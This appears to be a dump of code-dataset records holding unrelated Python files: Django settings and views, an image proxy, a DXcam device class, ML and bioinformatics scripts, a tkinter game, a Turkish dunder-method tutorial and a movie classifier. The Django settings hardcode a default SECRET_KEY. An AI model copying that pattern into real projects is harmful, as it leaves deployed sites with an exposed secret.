IndexError:\n\t\treturn relative_url\n\t#print(www.config['HOST'])\n\tend_result = url_for('proxy', url=argument)\n\t#end_result = \"http://\"+app.config['SERVER_NAME']+\"/\"+argument\n\tprint(full_url, relative_url, total_url, end_result)\n\treturn end_result\n\ndef get_image(extension, dimension):\n\tpossible = cat_images[extension]\n\tprint('DEBUG: possible',possible)\n\trandom.shuffle(possible)\n\tbest = possible[0]\n\tfor image in possible[1:]:\n\t\tif total_error(dimension, best[1]) > total_error(dimension, image[1]):\n\t\t\tbest = image\n\t\telif total_error(dimension, best[1]) == total_error(dimension, image[1]) and ratio_error(dimension, best[1]) > total_error(dimension, image[1]):\n\t\t\tbest = image\n\treturn best[0]\n#get_image returns file name with\n# minimal total area and minimal stretched area difference\n\ncat_images ={}\ndef populate_images(dirs):\n\tprint(\"DEBUG: populating images!\")\n\tglobal cat_images\n\tif len(cat_images.keys()) != 0:\n\t\treturn\n\tfor files in os.listdir(dirs):\n\t\tfull_path = os.path.join(dirs, files)\n\t\textension = files.split('/')[-1].split('.',1)[-1]\n\t\tif extension not in cat_images.keys():\n\t\t\tcat_images[extension] = []\n\t\tdimension = Image.open(full_path).size\n\t\tcat_images[extension].append((full_path, dimension))\n\tprint(\"DEBUG: populated images \", cat_images)\npopulate_images(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"images/\"))\n\ndef total_error(dimA, dimB):\n\treturn (dimA[0]*dimA[1] - dimB[0]*dimB[1])**2\n\ndef ratio_error(dimA, dimB):\n\tnDimA_1 = float(dimA[0])/dimB[0]*dimB[1]\n\tnDimA_0 = float(dimA[1])/dimA[1]*dimB[0]\n\treturn min(total_error((dimA[0], nDimA_1), dimB),\n\t\t\ttotal_error((nDimA_0, dimA[1]), dimB))\n\nif __name__ == '__main__':\n\tapp.run()\n","repo_name":"Ben0mega/image-proxy","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11912371746","text":"import os\nfrom pathlib import Path\n\nget = os.environ.get\n\nDEBUG = False\nENVIRONMENT = get('ENV', 'production') # development, testing\nDATABASE_URL = get('DATABASE_URL', 'mongodb://localhost:27017')\nSECRET_KEY = get('SECRET_KEY', '109la0m3tK8ErcOJGJNqkQTU-KdvEqw8oEnfKZ556LQ=')\n\ntry:\n from .local_settings import *\nexcept ImportError:\n pass\n\nWEBPACK_CONFIG = {\n 'DEFAULT': {\n 'CACHE': not DEBUG,\n 'STATS_FILE': str(Path(__file__).parent.parent / 'static' / 'dist' / 'stats.json')\n },\n 'VENDOR': {\n 'CACHE': not DEBUG,\n 'STATS_FILE': str(Path(__file__).parent.parent / 'static' / 'dist' / 'vendor-stats.json')\n }\n}\n","repo_name":"vgamula/sp","sub_path":"server/settings/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41940247210","text":"import os\n\nfrom django.conf import settings\nfrom django.utils.encoding import escape_uri_path\nfrom django.shortcuts import render, redirect\nfrom django.http.response import HttpResponseRedirect, HttpResponse\nfrom django.http.request import HttpRequest\n\nfrom .models import Files, FileContents, FileClasses\nfrom .db_repositoy.set_excel import Excel\nfrom .db_repositoy.get_excel import DBExcel\n\n\ndef home_page(request):\n \"\"\"\n Открытие главной страницы\n\n :param request:\n :return: home.html\n \"\"\"\n return render(request, 'excel_app/general_pages/home.html')\n\n\ndef files_list(request: HttpRequest):\n \"\"\"\n Открытие страницы со списком файлов. Так же сохранение данных в бд после нажатия кнопки.\n\n :param request:\n :return: excel_files.html\n \"\"\"\n if request.method == \"POST\":\n try:\n file = request.FILES.get('xls')\n exel_to_db = Excel(str(file), 'Sheet1', file)\n exel_to_db.set_info()\n except Exception as e:\n print(e)\n\n return render(request, 'excel_app/general_pages/excel_files.html', context={'files': Files.objects.all()})\n\n\ndef table_page(request, file_id):\n \"\"\"\n Страница с данными файла в виде таблицы. Скачать данную таблицу как excel.\n\n :param request:\n :param file_id: id файла в бд.\n :return:excel_table.html\n \"\"\"\n file_contents = FileContents.objects.filter(file_id=file_id)\n data = DBExcel(file_id)\n data.get_data() # чтение бд в data.data как pandas.DataFrame()\n file_path = os.path.join(settings.MEDIA_ROOT, \"temp\\\\\" + Files.objects.get(id=file_id).name)\n\n if os.path.exists(file_path):\n os.remove(file_path)\n print(\"exist\")\n\n if request.method == \"POST\":\n data.to_excel(file_path)\n with open(file_path, 'rb') as fh:\n name = str(Files.objects.get(id=file_id).name)\n print(name)\n response = HttpResponse(fh.read(), content_type=\"application/vnd.ms-excel\")\n response['Content-Disposition'] = 'attachment; filename=''' + escape_uri_path(name)\n return response\n\n return render(request, 'excel_app/general_pages/excel_table.html',\n context={'content': file_contents,\n 'data_html': data.to_html(),\n 'data_frame': data.get_data()})\n\n","repo_name":"YourBobi/B1","sub_path":"B1_WEB/excel_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"39557033679","text":"import ctypes\nfrom dataclasses import dataclass\nfrom typing import List\nimport comtypes\nfrom dxcam._libs.d3d11 import *\nfrom dxcam._libs.dxgi import *\n\n\n@dataclass\nclass Device:\n adapter: ctypes.POINTER(IDXGIAdapter1)\n device: ctypes.POINTER(ID3D11Device) = None\n context: ctypes.POINTER(ID3D11DeviceContext) = None\n im_context: ctypes.POINTER(ID3D11DeviceContext) = None\n desc: DXGI_ADAPTER_DESC1 = None\n\n def __post_init__(self) -> None:\n self.desc = DXGI_ADAPTER_DESC1()\n self.adapter.GetDesc1(ctypes.byref(self.desc))\n\n D3D11CreateDevice = ctypes.windll.d3d11.D3D11CreateDevice\n\n feature_levels = [\n D3D_FEATURE_LEVEL_11_0,\n D3D_FEATURE_LEVEL_10_1,\n D3D_FEATURE_LEVEL_10_0,\n ]\n\n self.device = ctypes.POINTER(ID3D11Device)()\n self.context = ctypes.POINTER(ID3D11DeviceContext)()\n self.im_context = ctypes.POINTER(ID3D11DeviceContext)()\n\n D3D11CreateDevice(\n self.adapter,\n 0,\n None,\n 0,\n ctypes.byref((ctypes.c_uint * len(feature_levels))(*feature_levels)),\n len(feature_levels),\n 7,\n ctypes.byref(self.device),\n None,\n ctypes.byref(self.context),\n )\n self.device.GetImmediateContext(ctypes.byref(self.im_context))\n\n def enum_outputs(self) -> List[ctypes.POINTER(IDXGIOutput1)]:\n i = 0\n p_outputs = []\n while True:\n try:\n p_output = ctypes.POINTER(IDXGIOutput1)()\n self.adapter.EnumOutputs(i, ctypes.byref(p_output))\n p_outputs.append(p_output)\n i += 1\n except comtypes.COMError as ce:\n if ctypes.c_int32(DXGI_ERROR_NOT_FOUND).value == ce.args[0]:\n break\n else:\n raise ce\n return p_outputs\n\n @property\n def description(self) -> str:\n return self.desc.Description\n\n @property\n def vram_size(self) -> int:\n return self.desc.DedicatedVideoMemory\n\n @property\n def vendor_id(self) -> int:\n return self.desc.VendorId\n\n def __repr__(self) -> str:\n return \"<{} Name:{} Dedicated VRAM:{}Mb VendorId:{}>\".format(\n self.__class__.__name__,\n self.desc.Description,\n self.desc.DedicatedVideoMemory // 1048576,\n self.desc.VendorId,\n )\n","repo_name":"ra1nty/DXcam","sub_path":"dxcam/core/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":339,"dataset":"github-code","pt":"96"} +{"seq_id":"22538242913","text":"def mating():\n values = input()\n values = values.split()\n \n k = int(values[0])\n m = int(values[1])\n n = int(values[2])\n \n total = k + m + n\n newtotal = total - 1\n \n #8 possible outcomes with dominant allele\n \n KK = ((k/total)*((k-1)/(newtotal)))\n KM = ((k/total)*(m/newtotal)) + ((m/total)*(k/newtotal))\n KN = ((k/total) * (n/newtotal)) + ((n/total)*(k/newtotal))\n MN = 0.5*(((m/total) * (n/newtotal)) + ((n/total)*(m/newtotal)))\n MM = 0.75*((m/total) * ((m-1)/newtotal))\n \n Probability = KK + KM + KN + MN + MM\n \n\n return Probability \n\nprint(mating())\n ","repo_name":"andrewgans/Final-Rosalind-Projects","sub_path":"IPRB.py","file_name":"IPRB.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25208019546","text":"# Uncertainty of Recurrent Neural Network models with dropout at time of prediction\n\n# %load 4_pred_uncertainty.py\nimport src.core as mlModule\nimport src.core_configs as configs\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef plotDropoutPrediction(modelList, predictions, means, stds, targetColumns, df_test, y_test, traintime=None):\n if traintime is not None:\n trainEndStr = [item for sublist in traintime for item in sublist]\n else:\n trainEndStr = None\n\n for i in range(len(modelList)):\n output_mean = means[i]\n output_std = stds[i]\n\n for j in range(output_mean.shape[-1]):\n mean = output_mean[:, j]\n std = output_std[:, j]\n\n upper = np.add(mean, std)\n lower = np.subtract(mean, std)\n\n fig, ax = plt.subplots(1, 1, figsize=(10,3), dpi=100)\n ax.set_xlabel('Date')\n ax.set_ylabel(mlModule._columnUnits[targetColumns[j]])\n ax.set_title(modelList[i].name + \"\\nPredictions and targets, \" + mlModule._columnDescriptions[targetColumns[j]])\n ax.plot(df_test.iloc[mlModule._maxEnrolWindow:].index, y_test[mlModule._maxEnrolWindow:, j], color=\"red\", alpha=0.5, label=\"targets\")\n ax.plot(df_test.iloc[mlModule._maxEnrolWindow:].index, upper, color=\"grey\", alpha=0.7, label=\"+/- 1 std bounds\")\n ax.plot(df_test.iloc[mlModule._maxEnrolWindow:].index, lower, color=\"grey\", alpha=0.7)\n ax.plot(df_test.iloc[mlModule._maxEnrolWindow:].index, mean, color=\"blue\", alpha=1.0, label=\"prediction\")\n ax.grid(1, axis='y')\n ax.legend(bbox_to_anchor=(1.05, 1), loc='upper left', borderaxespad=0., prop={'size': 10})\n \n if trainEndStr:\n for i, trainEndString in enumerate(trainEndStr):\n ax.axvline(x=pd.to_datetime(trainEndString, dayfirst=True), color='black' if i % 2 == 0 else 'blue', label='start training' if i % 2 == 0 else 'end training')\n\n plt.show()\n\ndef performDropoutPrediction(facility, model, resolution, lookback=12, retrain=False):\n filename, columns, irrelevantColumns, targetColumns, traintime, testtime, columnOrder = configs.getConfig(facility, model, resolution)\n\n df = mlModule.initDataframe(filename, columns, irrelevantColumns)\n df_train, df_test = mlModule.getTestTrainSplit(traintime, testtime)\n X_train, y_train, X_test, y_test = mlModule.getFeatureTargetSplit(targetColumns)\n\n lstm = mlModule.LSTM('LSTMs 1x128 d0.2 mod'+model, layers=[128], training=True, dropout=0.2, recurrentDropout=0.2, enrolWindow=lookback)\n gru = mlModule.GRU('GRUs 1x128 d0.2 mod'+model, layers=[128], training=True, dropout=0.2, recurrentDropout=0.2, enrolWindow=lookback)\n \n modelList = [\n lstm,\n gru,\n ]\n\n mlModule.initModels(modelList)\n mlModule.trainModels(retrain)\n\n predictions, means, stds = mlModule.predictWithModelsUsingDropout(numberOfPredictions=30)\n plotDropoutPrediction(modelList, predictions, means, stds, targetColumns, df_test, y_test, traintime)\n\nmodel = 'A'\n\nperformDropoutPrediction('F', model, '30min', 12, retrain=False)\nmlModule.reset()\nperformDropoutPrediction('G', model, '30min', 12, retrain=False)\nmlModule.reset()\nperformDropoutPrediction('G', model, '10min', 12*3, retrain=False)\n","repo_name":"hermanwh/master-thesis","sub_path":"py_examples/4_pred_uncertainty.py","file_name":"4_pred_uncertainty.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"96"} +{"seq_id":"40079571513","text":"from tkinter import *\nimport tkinter.messagebox\nimport math\nimport chat_utils\nimport pickle\n\nX = 600\nY = 480\nR = 15\nCO = 0.2\n\n\nclass GAME:\n def __init__(self, s, online, home, name, op):\n self.mainwindow = Tk()\n self.online = online\n self.ai_speed = 2\n self.ai_iq = 0.5\n if self.online:\n self.op = op\n else:\n self.op = 'Computer'\n self.name = name\n self.mainwindow.title('Game: ' + self.name)\n self.me = s\n self.win = 0\n self.lose = 0\n self.ai = True\n self.CV = Canvas(self.mainwindow, width=X, height=Y)\n self.CV.create_line(R, R, X - R, R)\n self.CV.create_line(X - R, R, X - R, Y - R)\n self.CV.create_line(R, R, R, Y - R)\n self.CV.create_line(R, Y - R, X - R, Y - R)\n self.home = home\n if self.home:\n self.cx = [X / 4, X * 3 / 4]\n else:\n self.cx = [X * 3 / 4, X / 4]\n self.cy = [Y / 2, Y / 2]\n self.xg = [0, 0]\n self.yg = [0, 0]\n self.ball0 = self.CV.create_oval((self.cx[0] - R, self.cy[0] - R, self.cx[0] + R, self.cy[0] + R), fill='black')\n self.ball1 = self.CV.create_oval((self.cx[1] - R, self.cy[1] - R, self.cx[1] + R, self.cy[1] + R), fill='white')\n self.mainwindow.bind('<KeyPress>', self.move)\n self.frame0 = Frame(self.mainwindow)\n self.frame1 = Frame(self.mainwindow)\n self.frame2 = Frame(self.mainwindow)\n self.frame_bottom = Frame(self.mainwindow)\n self.frame_top = Frame(self.mainwindow)\n self.frame_blank0 = Frame(self.mainwindow)\n self.frame_blank1 = Frame(self.mainwindow)\n self.label_b = Label(self.frame_bottom, text=' ')\n self.label_t = Label(self.frame_top, text=' ')\n self.label_blank0 = Label(self.frame_blank0, text=' ')\n self.label_blank1 = Label(self.frame_blank1, text=' ')\n self.score = StringVar()\n self.score.set(\" You \" + str(self.win) + \" : \" + str(self.lose) + \" Opponent\")\n self.label = Label(self.frame0, textvariable=self.score)\n self.difficulty = StringVar()\n self.difficulty.set('Normal')\n self.option = OptionMenu(self.frame1, self.difficulty, 'Easy', 'Normal', 'Hard')\n self.button_ai = Button(self.frame2, text=\" AI start \", command=self.start_ai)\n self.button_quit = Button(self.frame2, text=' Quit ', command=self.quit)\n self.label.pack()\n self.label_blank0.pack()\n self.label_blank1.pack()\n self.button_ai.pack(side='left')\n self.button_quit.pack()\n self.frame_top.pack()\n self.frame0.pack()\n self.CV.pack()\n self.frame_blank0.pack()\n self.option.pack()\n self.label_b.pack()\n self.label_t.pack()\n self.frame1.pack()\n self.frame_blank1.pack()\n self.frame2.pack()\n self.frame_bottom.pack()\n self.physics()\n if self.online:\n self.exchange()\n\n def start(self):\n self.mainwindow.mainloop()\n\n def move(self, event):\n if event.char.lower() == 's':\n self.yg[0] += 2\n if event.char.lower() == 'k':\n self.yg[1] += 2\n if event.char.lower() == 'a':\n self.xg[0] -= 2\n if event.char.lower() == 'j':\n self.xg[1] -= 2\n if event.char.lower() == 'w':\n self.yg[0] -= 2\n if event.char.lower() == 'i':\n self.yg[1] -= 2\n if event.char.lower() == 'd':\n self.xg[0] += 2\n if event.char.lower() == 'l':\n self.xg[1] += 2\n\n def save(self):\n try:\n infile = open(self.name + '.dat', 'rb')\n dic = pickle.load(infile)\n infile.close()\n except IOError:\n dic = {}\n if self.op in dic.keys():\n dic[self.op].append((self.win, self.lose))\n else:\n dic[self.op] = [(self.win, self.lose)]\n infile = open(self.name + '.dat', 'wb')\n pickle.dump(dic, infile)\n infile.close()\n\n def quit(self):\n self.save()\n if self.online:\n chat_utils.mysend(self.me, chat_utils.M_QGAME)\n self.mainwindow.destroy()\n\n def distance(self):\n return math.sqrt((self.cx[0] - self.cx[1]) ** 2 + (self.cy[0] - self.cy[1]) ** 2)\n\n def start_ai(self):\n self.initial_ai()\n self.match_up()\n\n def initial_ai(self):\n if self.difficulty.get() == 'Easy':\n self.ai_speed = 1.5\n self.ai_iq = 0.5\n elif self.difficulty.get() == 'Normal':\n self.ai_speed = 2\n self.ai_iq = 3\n elif self.difficulty.get() == 'Hard':\n self.ai_speed = 2.5\n self.ai_iq = 7\n\n def match_up(self):\n x = self.cx[0] - self.cx[1]\n y = self.cy[0] - self.cy[1]\n t = math.sqrt(x ** 2 + y ** 2)\n self.xg[1] += self.ai_speed * x / t\n self.yg[1] += self.ai_speed * y / t\n if self.cx[1] < X * CO:\n self.xg[1] += self.ai_iq\n if self.cx[1] + R > X * (1 - CO):\n self.xg[1] -= self.ai_iq\n if self.cy[1] - R < Y * CO:\n self.yg[1] += self.ai_iq\n if self.cy[1] + R > Y * (1 - CO):\n self.yg[1] -= self.ai_iq\n if self.ai:\n self.mainwindow.after(200, self.match_up)\n else:\n self.xg[1] = 0\n self.yg[1] = 0\n\n def hit(self):\n if self.distance() <= 2 * R:\n tmp0 = math.sqrt(self.xg[0] ** 2 + self.yg[0] ** 2)\n tmp1 = math.sqrt(self.xg[1] ** 2 + self.yg[1] ** 2)\n x = self.cx[0] - self.cx[1]\n y = self.cy[0] - self.cy[1]\n tmp = math.sqrt(x ** 2 + y ** 2)\n self.xg[0] = x / tmp * tmp1\n self.yg[0] = y / tmp * tmp1\n self.xg[1] = -x / tmp * tmp0\n self.yg[1] = -y / tmp * tmp0\n\n def exchange(self):\n chat_utils.mysend(self.me, chat_utils.M_INGAME +\n str(self.cx[0]) + ' ' + str(self.cy[0]) + ' ' +\n str(self.xg[0]) + ' ' + str(self.yg[0]))\n move = chat_utils.myrecv(self.me)\n if len(move) > 0:\n if move[0] == chat_utils.M_INGAME:\n op = move[1:].split()\n for i in range(4):\n op[i] = float(op[i])\n self.cx[1] = op[0]\n self.cy[1] = op[1]\n self.xg[1] = op[2]\n self.yg[1] = op[3]\n self.CV.after(50, self.exchange)\n elif move[0] == chat_utils.M_QGAME:\n self.save()\n self.online = False\n self.mainwindow.destroy()\n\n def physics(self):\n self.hit()\n for i in range(2):\n if self.xg[i] > 0:\n self.xg[i] = max(self.xg[i] - 0.05, 0)\n if self.xg[i] < 0:\n self.xg[i] = min(self.xg[i] + 0.05, 0)\n if self.yg[i] > 0:\n self.yg[i] = max(self.yg[i] - 0.05, 0)\n if self.yg[i] < 0:\n self.yg[i] = min(self.yg[i] + 0.05, 0)\n if (self.cx[i] + self.xg[i] >= R) and \\\n (self.cx[i] + self.xg[i] <= X - R) and \\\n (self.cy[i] + self.yg[i] >= R) and \\\n (self.cy[i] + self.yg[i] <= Y - R):\n self.cx[i] += self.xg[i]\n self.cy[i] += self.yg[i]\n else:\n if i == 0:\n self.lose += 1\n else:\n self.win += 1\n self.ai = False\n self.cx[i] += self.xg[i]\n self.cy[i] += self.yg[i]\n self.CV.coords(self.ball0, (self.cx[0] - R, self.cy[0] - R, self.cx[0] + R, self.cy[0] + R))\n self.CV.coords(self.ball1, (self.cx[1] - R, self.cy[1] - R, self.cx[1] + R, self.cy[1] + R))\n if self.home:\n self.cx = [X / 4, X * 3 / 4]\n else:\n self.cx = [X * 3 / 4, X / 4]\n self.cy = [Y / 2, Y / 2]\n self.xg = [0, 0]\n self.yg = [0, 0]\n if i == 0:\n self.score.set(\" You \" + str(self.win) + \" : \" + str(self.lose) + \" Opponent\")\n tkinter.messagebox.showinfo(\"Information\",\n \"You are out!\")\n else:\n self.score.set(\" You \" + str(self.win) + \" : \" + str(self.lose) + \" Opponent\")\n tkinter.messagebox.showinfo(\"Information\",\n \"You win!\")\n self.ai = True\n self.CV.coords(self.ball0, (self.cx[0] - R, self.cy[0] - R, self.cx[0] + R, self.cy[0] + R))\n self.CV.coords(self.ball1, (self.cx[1] - R, self.cy[1] - R, self.cx[1] + R, self.cy[1] + R))\n self.mainwindow.after(5, self.physics)\n\n\nif __name__ == '__main__':\n MyGUI = GAME('s', False, True, 'lin', '')\n MyGUI.start()\n","repo_name":"ShenghaoLin/HittingBall","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30017010511","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 27 23:01:31 2020\n\n@author: Asus\n\"\"\"\n\n#getitem-setitem kullanımı\n\n\n#bazı nesneleri method gibi çağırabiliriz __cal__ ile çağırıyoruz \nclass Sample:\n def __call__(self):\n print('__call__ called')\n \ns = Sample()\ns() # s.__call__()\n\n#__call__ argüman gönderme \nclass Sample:\n def __call__(self, x, y, z):\n print('__call__ called')\n return x + y + z\n \ns = Sample()\nresult = s(10, 20, 30) \nprint(result)\n\n#yukaridaki örneğin en genel hali \nclass Sample:\n def __call__(self, *args):\n print('__call__ called')\n return sum(args)\n \ns = Sample()\nresult = s(10, 20, 30, 40, 50) \nprint(result)\n\n#sınıf nesnesini köşeli parantezle kullanmak istersem getitem ile eşdeğerdir. \nclass Sample:\n def __getitem__(self, index):\n print('__getitem__')\n return index * 2\n \ns = Sample()\n\nx = s[10] # s.__getitem(10)\nprint(x)\n\n#Sınıfımı array gibi kullandım \nclass Array:\n def __init__(self, size):\n self.array = [0] * size\n\n def __getitem__(self, index):\n return self.array[index]\n\n\na = Array(10)\nx = a[3] # a.__getitem__(3)\nprint(x)\n\n#getitem-setitem örnek \nclass Array:\n def __init__(self, size):\n self.array = [0] * size\n \n def __getitem__(self, index):\n return self.array[index]\n \n def __setitem__(self, index, val):\n self.array[index] = val\n \ns = Array(10)\nfor i in range(10):\n s[i] = i\n \nfor i in range(10):\n print(s[i], end=' ')\n\n\n\n#tarih sanki bir diziymiş gibi belli bir elemanını alıp kullanıyorum \nclass Date:\n def __init__(self, day, month, year):\n self.day = day\n self.month = month\n self.year = year\n \n def __str__(self):\n return f'{self.day}/{self.month}/{self.year}'\n \n def __getitem__(self, index):\n if index < 0 or index > 2:\n raise IndexError('out of range')\n if index == 0:\n return self.day\n if index == 1:\n return self.month\n return self.year\n \n\nd = Date(10, 12, 2009)\nprint(d)\nday = d[0]\nprint(day)\nmonth = d[1]\nprint(month)\nyear = d[2]\nprint(year)\n\n\n\n\n#Setitem örnek: \nclass Date:\n def __init__(self, day, month, year):\n self.day = day\n self.month = month\n self.year = year\n \n def __str__(self):\n return f'{self.day}/{self.month}/{self.year}'\n \n def __getitem__(self, index):\n if index < 0 or index > 2:\n raise IndexError('out of range')\n if index == 0:\n return self.day\n if index == 1:\n return self.month\n return self.year\n \n def __setitem__(self, index, val):\n if index < 0 or index > 2:\n raise IndexError('out of range')\n if index == 0:\n self.day = val\n elif index == 1:\n self.month = val\n else:\n self.year = val\n\nd = Date(10, 12, 2009)\n\nprint(d)\nd[0] = 20\nprint(d) \n\n\n#karma örnek: \nclass Sample:\n def __init__(self):\n self.dict = {}\n \n def __setitem__(self, key, value):\n self.dict[key] = value\n \n def __getitem__(self, key):\n return self.dict[key]\n \n \ns = Sample()\ns['ali'] = 300\ns['veli'] = 200\ns[100] = 'kazım'\n\nprint(s['ali'])\nprint(s['veli'])\nprint(s[100]) \n\n\n\n#matrix ekrana basma örneği \nclass Matrix:\n def __init__(self, nrows, ncols):\n self.matrix = [[0] * ncols for i in range(nrows)]\n\n def __getitem__(self, index):\n return self.matrix[index[0]][index[1]]\n\n def __setitem__(self, index, val):\n self.matrix[index[0]][index[1]] = val\n\n def __str__(self):\n s = ''\n for i in range(len(self.matrix)):\n for k in range(len(self.matrix[0])):\n if k != 0:\n s += ' '\n s += str(self.matrix[i][k])\n s += '\\n'\n\n return s\n\nm = Matrix(5, 5)\n\nfor i in range(5):\n for k in range(5):\n m[i, k] = i + k\n\nfor i in range(5):\n for k in range(5):\n print(m[i, k], end=' ')\n print()\n \nprint()\nprint(m) #str şeklinde ekrana basıyor \n\n#kendi yazdığımız sınıfta slicing işlemi yapma örneği \n#slice built in sınıfıyla bunu yapabiliriz \n#slice nesnesi oluşturup içinden istediğimizi çekebiliyoruz \n\nclass Sample:\n def __int__(self):\n return 100\n \ns = Sample()\nx = int(s) # s.__int__()\nprint(x)\n\n\n#Math operations by my class\nimport math\nclass Rational:\n def __init__(self, a, b = 1):\n self.a = a\n self.b = b\n\n if self.b < 0:\n self.a = -self.a\n self.b = -self.b\n\n self.simplify()\n\n def simplify(self):\n result = math.gcd(abs(self.a), abs(self.b))\n self.a //= result\n self.b //= result\n\n def __str__(self):\n if self.b == 0:\n raise ValueError('invalid rational number!')\n if self.b == 1:\n return str(self.a)\n if self.a == 0:\n return '0'\n return f'{self.a}/{self.b}'\n\n def __add__(self, r):\n num = self.a * r.b + self.b * r.a\n denom = self.b * r.b\n return Rational(num, denom)\n\n def __sub__(self, r):\n num = self.a * r.b - self.b * r.a\n denom = self.b * r.b\n return Rational(num, denom)\n\n def __mul__(self, r):\n num = self.a * r.a\n denom = self.b * r.b\n return Rational(num, denom)\n\n def __truediv__(self, r):\n num = self.a * r.b\n denom = self.b * r.a\n return Rational(num, denom)\n\n def __pow__(self, x):\n num = self.a ** x\n denom = self.b ** x\n return Rational(num, denom)\n\n def __lt__(self, r):\n return self.a / self.b < r.a / r.b\n\n def __le__(self, r):\n return self.a / self.b <= r.a / r.b\n\n def __gt__(self, r):\n return self.a / self.b > r.a / r.b\n\n def __ge__(self, r):\n return self.a / self.b >= r.a / r.b\n\n def __eq__(self, r):\n return self.a / self.b == r.a / r.b\n\n def __ne__(self, r):\n return self.a / self.b != r.a / r.b\n\n def __neg__(self):\n return Rational(-self.a, self.b)\n\n def __pos__(self):\n return Rational(self.a, self.b)\n \n def __float__(self):\n return self.a / self.b\n \n\nr = Rational(2, 3)\nf = float(r)\nprint(f)\n ","repo_name":"dogancantorun8/Python_Learning","sub_path":"oop/getitem-setitem.py","file_name":"getitem-setitem.py","file_ext":"py","file_size_in_byte":6384,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"17318437799","text":"from django.core.mail import BadHeaderError, send_mail\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.apps import apps \nfrom .decorators import check_recaptcha\nfrom .forms import ContactForm\n\n@check_recaptcha\ndef form(request):\n \"\"\" This view displays and processes the contact form \"\"\"\n if request.method == 'GET':\n form = ContactForm()\n else: # Post request\n form = ContactForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data['name']\n subject = form.cleaned_data['subject']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n try:\n send_mail(subject, message, email, [apps.get_app_config('Contactform').contact_form_recipient,])\n except BadHeaderError:\n messages.error(request, 'Invalid header found, please try again.')\n return redirect('contactform:success')\n\n return render(request, 'contactform/form.html', {\n 'meta_title': 'Contact Form',\n 'meta_description': 'Get in touch or open a support ticket.',\n 'form': form\n })\n\n\ndef success(request):\n \"\"\" Displays the success page \"\"\"\n return render(request, 'contactform/success.html', {\n 'meta_title': 'Thanks for your message',\n 'meta_description': 'Your message has been received, we\\'ll reply as soon as possible.'})\n","repo_name":"flaab/pz-django-contactform","sub_path":"contactform/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"13136060812","text":"import pandas as pd \nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\nimport numpy as np\n\ndata_from_csv = pd.read_csv('movie_train.csv', header=0)\ndata_from_csv['Runtime'] = data_from_csv['Runtime'].apply(str)\n\ndef _generate_data(data):\n\t'''Generates each line of movie at a time'''\n\tfor item in data:\n\t\tyield item\n\n\n# Split the data into testing data and training data \ntraining_data = _generate_data(data_from_csv[['Runtime', 'Director', 'Writer', 'Actor']][:-15].values)\ntesting_data = _generate_data(data_from_csv[['Runtime', 'Director', 'Writer', 'Actor']][-15:].values)\n\n#Generate features and transform using countVectorizer and TfidfTransformer\ncount_vect = CountVectorizer()\nX_train_counts = count_vect.fit_transform(str(x) for x in training_data)\n\n#transform the data into numpy array that .fit expects\ntf_transformer = TfidfTransformer()\nX_train_tfidf = tf_transformer.fit_transform(X_train_counts)\n\n#NaiveBayes classifier\nclf = MultinomialNB().fit(X_train_tfidf, data_from_csv['Target'][:-15].values)\n\n#now test on 2016 data \ntest_data_from_csv = pd.read_csv('movie_test.csv', header=0)\ndef _generate_test_data():\n\t'''generates each row of csv file at a time'''\n\tfor item in test_data_from_csv[['Runtime', 'Director', 'Writer', 'Actor']].values:\n\t\tyield item\ntest_gen = _generate_test_data()\n\n\n#transform the string data to numpy array\nX_c = count_vect.transform(str(movie) for movie in test_gen)\nX_tf = tf_transformer.transform(X_c)\nfor movie, target in zip(test_data_from_csv['Name'], clf.predict(X_tf)):\n\tif target == 1:\n\t\tprint ('{movie} is Success'.format(movie=movie))\n\telse:\n\t\tprint ('{movie} is flop'.format(movie=movie))\nprint () \nprint ('Now svm implementation')\nprint ()\n\n# SVM classifier with deault parameters\nsvm_clf = SGDClassifier(loss='hinge')\nsvm_clf.fit(X_train_tfidf, data_from_csv['Target'][:-15].values)\nfor movie, target in zip(test_data_from_csv['Name'], svm_clf.predict(X_tf)):\n\tif target == 1:\n\t\tprint ('{movie} is Success'.format(movie=movie))\n\telse:\n\t\tprint ('{movie} is flop'.format(movie=movie))\n\n\n#evaluation of performance\ntest_counts = count_vect.transform(str(movie) for movie in testing_data)\ntest_tfidf = tf_transformer.transform(test_counts)\nnv_predicted = clf.predict(test_tfidf)\nprint ('Naive Bayes accuracy ', np.mean(nv_predicted == data_from_csv['Target'][-15:].values))\n\nsvm_predicted = svm_clf.predict(test_tfidf)\nprint ('SVM accuracy ',np.mean(svm_predicted == data_from_csv['Target'][-15:].values))\n\ndef main():\n\tpass\n\nif __name__ == 